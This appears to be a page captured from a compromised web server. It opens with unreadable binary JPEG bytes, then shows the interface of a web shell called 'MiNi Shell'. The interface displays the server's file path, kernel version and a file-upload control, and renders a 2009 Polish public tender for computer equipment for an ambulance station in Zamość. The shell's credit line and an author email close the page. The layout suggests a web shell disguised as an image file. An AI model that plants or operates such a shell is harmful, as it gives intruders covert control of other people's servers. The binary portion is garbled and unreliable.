JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091020/183195-N-2009.html

<p class="kh_header"><b>Zamość: Dostawa sprzętu komputerowego i oprogramowania dla Samodzielnej Publicznej Stacji Pogotowia Ratunkowego i Transportu Sanitarnego w Zamościu</b><br>
<b>Numer ogłoszenia: 183195 - 2009; data zamieszczenia: 20.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielna Publiczna Stacja Pogotowia Ratunkowego i Transportu Sanitarnego , ul. Starowiejska 23, 22-400 Zamość, woj. lubelskie, tel. 084 6384065, faks 084 6271196.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pogotowie-zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego i oprogramowania dla Samodzielnej Publicznej Stacji Pogotowia Ratunkowego i Transportu Sanitarnego w Zamościu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sprzętu komputerowego i oprogramowania dla Samodzielnej Publicznej Stacji Pogotowia Ratunkowego i Transportu Sanitarnego w Zamościu, tj.:
 1. Zestaw komputerowy typ A - 10 szt.
 2. Zestaw komputerowy typ B - 2 szt.
 3. Zestaw komputerowy typ C - 2 szt.
 4. Zestaw komputerowy typ D - 2 szt.
 5. Systemy operacyjne do zestawów komputerowych - 16 szt.
 6. Pakiet oprogramowania dla biur  -16 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 1 500,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy:
     1) posiadają uprawnienia do wykonania określonej działalności lub czynności, 
         jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

     2) posiadają niezbędną wiedzę i  doświadczenie oraz dysponują  potencjałem 
         technicznym i  osobami  zdolnymi  do wykonania zamówienia lub przedstawią 
         pisemne zobowiązanie innych podmiotów do udostępnienia potencjału  
         technicznego i osób zdolnych do wykonania zamówienia;

     3) znajdują  się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
         zamówienia;

     4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

     Potwierdzeniem spełnienia tych warunków będą dokumenty i oświadczenia 
     złożone  w ofercie.Niespełnienie choćby jednego z podanych warunków 
     podmiotowych, spowoduje  wykluczenie  wykonawcy z postępowania, 
     stosownie do art. 24 ust.1, pkt 10 uPzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty i oświadczenia wymagane celem  potwierdzenia spełnienia 
    warunków udziału w postępowaniu:
1) Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu 
    o których mowa w  art. 22 ust. 1 ustawy Prawo zamówień publicznych z 29 
    stycznia 2004 r. z późn. zm. -  druk w załączeniu. 

2) Oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania o 
    udzielenie zamówienie publicznego  na podstawie art. 24 ust. 1 ustawy Prawo 
    zamówień publicznych z 29 stycznia  2004 r. z późn. zm. -  druk  w załączeniu.

Dokumenty wymagane celem potwierdzenia, że wykonawca  posiada uprawnienia 
do wykonywania  określonej działalności  lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
    ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
    rejestru lub zgłoszenia
           do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed 
           upływem  terminu składania ofert;

      2) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego 
      oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego   
      potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz
      składek na ubezpieczenie zdrowotne lub społeczne; lub zaświadczenie, że wykonawca uzyskał 
      przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
      wstrzymanie w całości  wykonania decyzji  właściwego organu, wystawione nie wcześniej 
      niż 3 miesiące przed upływem terminu składania ofert;
 
     3)  Aktualna informacja z Krajowego Rejestru  Karnego w zakresie określonym w art. 24 ust.1
           pkt 4 - 8  ustawy (informacja musi dotyczyć wszystkich wymienionych w dokumencie 
           potwierdzającym status prawny wykonawcy członków władz), wystawiona nie wcześniej niż
           6 miesięcy przed  upływem terminu składania ofert;	

4)  Aktualna informacja z Krajowego Rejestru  Karnego w zakresie określonym w art. 24 
     ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu 
     składania ofert.

      Dokumenty wymagane celem potwierdzenia, że wykonawca posiada  niezbędną wiedzę 
      i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania
      zamówienia:

     1. Wykaz minimum trzech dostaw, wykonanych  w okresie ostatnich trzech lat przed dniem 
          wszczęcia przedmiotowego postępowania, a jeżeli okres prowadzenia działalności jest krótszy
           - to w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym 
          przedmiot zamówienia z podaniem ich wartości, przedmiotu zamówienia, dat wykonania 
          i odbiorców  oraz załączenia dokumentów potwierdzających, że dostawy te  zostały wykonane 
          należycie - druk w załączeniu.

      Pozostałe dokumenty, informacje i oświadczenia, które musi zawierać oferta :
      1) Wypełniony formularz oferty wg załączonego druku;

       2) wypełniony formularz z  oferowanymi parametrami techniczno-użytkowymi - Zał. nr 1A;
 
       3) wypełniony formularz oferty cenowej - druk w zał.

 4) Dane o Wykonawcy  -  druk w zał.

       5) Dowód wpłaty wadium;
       6) Oświadczenie o posiadaniu certyfikatu jakości ISO 9001 producenta oferowanych komputerów; 
  
       7) Oświadczenie o posiadaniu  certyfikatów CE  na oferowany sprzęt lub deklaracji  zgodności  
           z jednoczesnym  zobowiązaniem, że na każde wezwanie zamawiającego wykonawca 
           przedstawi w wyznaczonym terminie stosowne dokumenty, sporządzone w języku polskim.

      8)  Oświadczenie producenta, potwierdzające spełnianie wymogu głośności jednostki centralnej 
            wg normy ISO 9296 bez nośników

       9) Oświadczenie, że oferowany sprzęt komputerowy i oprogramowanie  posiada wymagane 
           parametry techniczno - użytkowe, określone w załącznikach Nr 1 i  Nr 1A.
                
     10) Oświadczenie wykonawcy o akceptacji wymaganych przez zmawiającego warunków, 
            świadczonych przez serwis gwarancyjny i pogwarancyjny, określonych we Wzorze umowy;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pogotowie-zamosc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielna Publiczna Stacja Pogotowia ratunkowego i Transportu Sanitarnego , ul. Starowiejska 23, 22-400 Zamość, pokój 213.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2009 godzina 12:00, miejsce: Samodzielna Publiczna Stacja Pogotowia ratunkowego i Transportu Sanitarnego , ul. Starowiejska 23, 22-400 Zamość, pokój 211 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com